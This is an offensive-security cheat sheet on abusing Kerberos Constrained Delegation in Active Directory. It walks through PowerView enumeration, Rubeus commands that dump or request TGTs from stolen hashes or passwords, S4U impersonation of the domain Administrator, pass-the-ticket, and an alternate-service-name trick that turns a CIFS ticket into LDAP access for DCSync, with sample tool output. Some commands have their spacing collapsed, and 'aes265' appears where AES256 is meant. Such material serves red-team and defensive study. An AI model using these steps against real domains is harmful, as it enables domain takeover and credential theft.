Microsoft introduced Constrained Delegation in Windows Server 2003 to provide a more secure form of delegation compared to the high-risk Unconstrained Delegation.
With Constrained Delegation, administrators can specify the services or applications for which a server is allowed to act on behalf of a user, thereby limiting the attack surface. This feature can reduce the risk of an attacker impersonating a user and accessing resources that they are not authorized to access.
Enumeration
PowerView
# Get computer Constrained DelegationGet-DomainComputer-TrustedToAuth| Select DnsHostName,UserAccountControl,msds-allowedtodelegateto | FL# Get user Constrained DelegationGet-DomainUser-TrustedToAuth
PowerShell
# Search both users and computers for Constrained DelegationGet-ADObject-Filter {msDS-AllowedToDelegateTo -ne"$null"} -Properties msDS-AllowedToDelegateTo
Obtain TGT
# Triage current ticketsRubeus.exetriage# Dump the systems TGTRubeus.exedump/luid:[LUID]/service:[krbtgt]/user:[Hostname]/nowrap# OR# If you have the NTLM hash for the compromised accountRubeus.exeasktgt/user:[User]/ntlm:[NTLMHash]OR/aes265[aes265Hash]# If you have the aes265 hash for the compromised accountRubeus.exeasktgt/user:[User]/aes265[aes265Hash]# If you have the plain text passwordrubeus.exeasktgt/user:[User]/password:[Password]
# Triage current ticketsInvoke-Rubeus-Command "triage"# Dump the systems TGTInvoke-Rubeus-Command "dump /luid:[LUID] /service:[krbtgt] /user:[Hostname] /nowrap"# OR# If you have the NTLM hash for the compromised accountInvoke-Rubeus-Command "asktgt /user:[User] /ntlm:[NTLM Hash] OR /aes265[aes265 Hash]"# If you have the aes265 hash for the compromised accountInvoke-Rubeus-Command "asktgt /user:[User] /aes265[aes265 Hash]"# If you have the plain text passwordInvoke-Rubeus-Command "asktgt /user:[User] /password:[Password]"
Obtains TGS for service
# Use obtained TGT to request a TGS ticket for the delegated service and impersonate another userRubeus.exes4u/impersonateuser:[User]/msdsspn:[SPN/FQDN]/user:[User]/ticket:[Base64ticket]/nowrap
[*] Action: S4U
[*] Building S4U2self request for: 'SRV01$@SECURITY.LOCAL'
[*] Using domain controller: DC01.Security.local (10.10.10.100)
[*] Sending S4U2self request to 10.10.10.100:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'SRV01$@SECURITY.LOCAL'
[*] base64(ticket.kirbi):
[Base64 Ticket Output]
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc01.security.local'
[*] Building S4U2proxy request for service: 'cifs/dc01.security.local'
[*] Using domain controller: DC01.Security.local (10.10.10.100)
[*] Sending S4U2proxy request to domain controller 10.10.10.100:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc01.security.local':
[Base64 Ticket Output]
# Use obtained TGT to request a TGS ticket for the delegated service and impersonate another userInvoke-Rubeus-Command "s4u /impersonateuser:[User] /msdsspn:[SPN/FQDN] /user:[User] /ticket:[Base64 ticket] /nowrap"
# Method 1: Pass ticket into seperate session (Preffered)# Create new LUID session (Requires Elevation)Rubeus.execreatenetonly/program:c:\windows\system32\cmd.exe/show# Pass ticket into new sessionRubeus.exeptt/luid:[LUIDfrompreviouscommand]/ticket:[Base64ticket]# Method 2: Pass ticket directly into current session (Can cause auth issues)Rubeus.exeptt/ticket:[Base64ticket]
# Method 1: Pass ticket into seperate session (Preffered)# Create new LUID session (Requires Elevation)Invoke-Rubeus-Command "createnetonly /program:c:\windows\system32\cmd.exe /show"# Pass ticket into new sessionInvoke-Rubeus-Command "ptt /luid:[LUID from previous command] /ticket:[Base64 ticket]"# Method 2: Pass ticket directly into current session (Can cause auth issues)Invoke-Rubeus-Command "ptt /ticket:[Base64 ticket]"
With effective Domain Administrator rights on the primary Domain Controllers for the CIFS service we can perform actions based on CIFS such as Psexec and remotely listing the C$ drive.
Alternate Service Name
Kerberos uses a Service Principal Name (SPN) to identify a service during authentication, which is typically a combination of the service name and the host's name where the service is running. Rubeus.exe includes an option called /altservicename that enables an attacker to use a different service name when constructing the SPN. This option can be helpful in certain situations, such as when the default service name is unavailable or the attacker wants to target a specific service.
In this instance, we're leveraging the TGT issued for SRV01$ to obtain a TGS for LDAP.
Following on from the section: Obtain TGT use the following commands to generate a TGS for the alternative service name.
[*] Action: S4U
[*] Building S4U2self request for: 'SRV01$@SECURITY.LOCAL'
[*] Using domain controller: DC01.Security.local (10.10.10.100)
[*] Sending S4U2self request to 10.10.10.100:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'SRV01$@SECURITY.LOCAL'
[*] base64(ticket.kirbi):
[Base64 Ticket Output]
[*] Impersonating user 'administrator' to target SPN 'cifs/dc01.security.local'
[*] Final ticket will be for the alternate service 'ldap'
[*] Building S4U2proxy request for service: 'cifs/dc01.security.local'
[*] Using domain controller: DC01.Security.local (10.10.10.100)
[*] Sending S4U2proxy request to domain controller 10.10.10.100:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'ldap'
[*] base64(ticket.kirbi) for SPN 'ldap/dc01.security.local':
[Base64 Ticket Output]
In the above output we alternate the CIFS service for LDAP. As the Domain Administrator has been impersonated this can be used to perfrom DCSync.
